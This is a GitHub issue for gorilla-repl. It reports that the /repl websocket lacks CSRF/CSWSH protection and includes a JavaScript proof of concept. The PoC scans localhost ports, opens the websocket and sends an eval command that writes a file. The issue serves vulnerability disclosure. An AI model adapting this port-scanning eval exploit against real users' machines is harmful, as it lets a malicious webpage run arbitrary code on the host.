gorilla-repl icon indicating copy to clipboard operation
gorilla-repl copied to clipboard
verified publisher icon JonyEpsilon

The websocket is not protected against CSRF

Open atx opened this issue 9 years ago • 0 comments

The websocket at /repl does not seem to be protected against CSRF (or, CSWSH as some like to call it). This allows a malicious website to execute arbitrary code on the host.

PoC:

var ports = [];
var done = false;

for (var i = 10000; i < 65535; i++) {
    ports.push(i);  
}

function spawn() {
    if (done || ports.length < 1)
        return;
    var port = ports.pop();
    var ws = new WebSocket("ws://localhost:" + port + "/repl");
    ws.onerror = spawn;
    ws.onopen = function() {
        done = true;
        console.log("Connected");
        ws.send(JSON.stringify({"op": "eval", "code": "(spit \"/tmp/file\" \"evil!\")" }))
    }
}

for (var i = 0; i < 200; i++) {
    spawn();
}

atx avatar Mar 30 '16 07:03 atx